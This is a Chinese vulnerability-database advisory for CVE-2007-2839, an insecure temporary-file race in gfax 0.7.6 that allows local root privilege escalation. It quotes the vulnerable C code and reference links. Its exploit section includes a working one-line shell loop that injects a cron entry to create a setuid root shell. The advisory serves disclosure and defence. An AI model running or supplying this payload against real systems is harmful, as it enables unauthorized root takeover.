gfax不安全临时文件本地权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113252 漏洞类型 竞争条件
发布时间 2007-07-05 更新时间 2007-07-06
CVE编号 CVE-2007-2839 CNNVD-ID CNNVD-200707-090
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/30280
https://www.securityfocus.com/bid/24780
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-090
|漏洞详情
"gfax是网络传真程序的GHOME前端。gfax在处理临时文件时存在漏洞,本地攻击者可能此漏洞提升自己的权限。gfax的src/mgett_setup.c文件中的delete_crontab_entry()函数以不安全的方式处理了临时文件:/*ifit'sNULLthennukethefaxrunqcrontabentry.*/if((fin=fopen("/etc/crontab","r"))==NULL){do_message(_("\nCan'topen/etc/crontab\n"));return;}if((fout=fopen("/tmp/crontab","w"))==NULL){do_message(_("\nCan'tcreate/tmp/crontab\n"));return;}while(fgets(buf,128,fin)!=NULL){fputs(buf,fout);fclose(fout);fclose(fin);/*nowcopythenewfilebackto/etc*/if((fin=fopen("/tmp/crontab","r"))==NULL){do_message(_("\nCan'topen/tmp/crontab\n"));return;}if((fout=fopen("/etc/crontab","w"))==NULL){do_message(_("\nCan'tcreate/etc/crontab\n"));return;}while((c=fgetc(fin))!=EOF)fputc(c,fout);fclose(fout);fclose(fin);remove("/tmp/crontab");这可能导致向/etc/crontab文件中写入任意命令。如果/tmp/crontab已存在的话(非root用户所有),就会被截短并删除,但所有者仍保持为非root用户,因此第一个和第二个拷贝之间就存在竞争条件,允许向/etc/crontab附加任意行。"
|漏洞EXP
source: http://www.securityfocus.com/bid/24780/info

GFAX is prone to a vulnerability that lets local attackers execute arbitrary commands with superuser privileges. Successful attacks will result in the complete compromise of affected computers.

GFAX 0.7.6 is vulnerable; other versions may also be affected. 

while true; do echo "*/1 * * * * root /bin/cp /bin/sh /tmp && chmod 4755 /tmp/sh" > /tmp/crontab; done
|受影响的产品
GFAX GFAX 0.7.6 Debian Linux 3.1
|参考资料

来源:DEBIAN
名称:DSA-1329
链接:http://www.debian.org/security/2007/dsa-1329
来源:OSVDB
名称:37883
链接:http://osvdb.org/37883
来源:XF
名称:gfax-deletecrontab-command-execution(35403)
链接:http://xforce.iss.net/xforce/xfdb/35403
来源:SECTRACK
名称:1018335
链接:http://www.securitytracker.com/id?1018335
来源:BID
名称:24780
链接:http://www.securityfocus.com/bid/24780
来源:SECUNIA
名称:25967
链接:http://secunia.com/advisories/25967
来源:SECUNIA
名称:25937
链接:http://secunia.com/advisories/25937